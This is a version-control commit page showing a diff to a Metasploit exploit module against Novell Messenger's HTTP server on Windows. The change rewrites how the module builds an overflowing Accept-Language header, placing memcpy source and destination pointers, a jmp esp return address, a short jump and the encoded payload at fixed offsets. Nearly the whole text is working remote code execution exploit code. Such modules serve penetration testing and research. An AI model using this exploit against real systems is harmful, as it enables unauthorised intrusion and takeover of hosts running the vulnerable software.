Updated
git-svn-id: file:///home/svn/incoming/trunk@3601 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
589205e5ff
commit
7e0f539b12
|
@ -31,9 +31,7 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 500,
|
'Space' => 500,
|
||||||
'BadChars' =>
|
'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join,
|
||||||
"\x00\x3a\x3b\x3c\x3d\x3e\x3f\x09\x0b\x0a\x0d\x20\x21\x22\x23\x24\x25\x26\x2c\x10"+
|
|
||||||
[*("A".."Z")].join,
|
|
||||||
'StackAdjustment' => -3500,
|
'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
|
@ -49,34 +47,12 @@ class Exploits::Windows::Http::NovellMessengerAcceptLanguage < Msf::Exploit::Rem
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
lang =
|
lang = Rex::Text.rand_text_alphanumeric(1900)
|
||||||
# Padding to reach the memcpy src pointer
|
lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC
|
||||||
Rex::Text.rand_text_alphanumeric(16) +
|
lang[272, 4] = [target['Rets'][1]].pack('V') # DST
|
||||||
|
lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP
|
||||||
# The source pointer for the memcpy
|
lang[268, 2] = "\xeb\x06"
|
||||||
[target['Rets'][1]].pack('V') +
|
lang[276, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
# Padding to reach the stack return address
|
|
||||||
Rex::Text.rand_text_alphanumeric(240)
|
|
||||||
|
|
||||||
# The return address (a jmp esp)
|
|
||||||
[target['Rets'][0]].pack('V') +
|
|
||||||
|
|
||||||
# Jump over the next 6 bytes to payload
|
|
||||||
"\xeb\x06" +
|
|
||||||
|
|
||||||
# Padding to reach the memcpy dst pointer
|
|
||||||
Rex::Text.rand_text_alphanumeric(2) +
|
|
||||||
|
|
||||||
# The destination pointer for the memcpy
|
|
||||||
[target['Rets'][1]].pack('V') +
|
|
||||||
|
|
||||||
# The actual payload
|
|
||||||
payload.encoded +
|
|
||||||
|
|
||||||
# Padding to keep the request aligned in memory
|
|
||||||
Rex::Text.rand_text_alphanumeric(1500-payload.encoded.length)
|
|
||||||
|
|
||||||
|
|
||||||
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
|
res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n"
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue